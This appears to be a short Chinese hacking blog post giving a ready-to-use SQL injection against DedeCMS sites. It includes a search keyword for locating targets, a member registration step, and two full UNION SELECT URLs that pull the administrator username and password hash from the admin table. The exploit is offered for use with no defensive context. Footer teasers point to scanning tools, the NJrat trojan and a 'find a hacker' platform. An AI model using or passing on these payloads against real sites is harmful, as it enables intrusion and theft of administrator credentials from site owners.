dedecms注入爆管理员用户密码 ***

hacker5年前 (2020-05-31)黑客文章1016

关键词：powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

返回列表

Striker是一个让人抵触的信息内容和漏洞扫描器。只必须了解网站域名，就可以完成自动化技术信息收集和漏洞检测；针对初学者非常的合适！作用只应向Striker出示网站域名，它便会全...

Sqlmap是一个技术专业的SQL引入专用工具，使用方法也许多，实际可以用"sqlmap -hh"查询详细的指令帮助文件，我这仅仅给大伙儿共享一些最常见的Sqlmap用法：一、Sql...

不久前，有一个事在新浪微博特火的，一名程序猿用了一款姓名叫NJrat的木马病毒反控制了互联网诈骗犯。用木马病毒来基础学习网络黑客专业知识，会让许多新手有兴趣爱好。但是许多新手在检测...

什么叫openssh？ OpenSSH是一个十分火爆的SSH网络信息安全专用工具，被数千万的互联网客户应用。一切n00b都能够对你说，像telnet，rlogin和ftp那样的协议书是不安全的。Op...

前一段时间，由于程序漏洞造成网页内容多处被挂博彩的内容信息，木马删除后，但是百度收录的挂马页面却都过去几个月了依然还是存在于是利用百度站长平台工具的死链提交将挂马页面删除。下面就为大家分享一下详细的操...

什么叫GnuPG？ GnuPG是由Phil Zimmerman最开始撰写的著名的系统加密。它协助客户维护她们的数据信息免遭风险性。它是PGP规范的开源系统完成。 GnuPG是完全免费的...

找黑客平台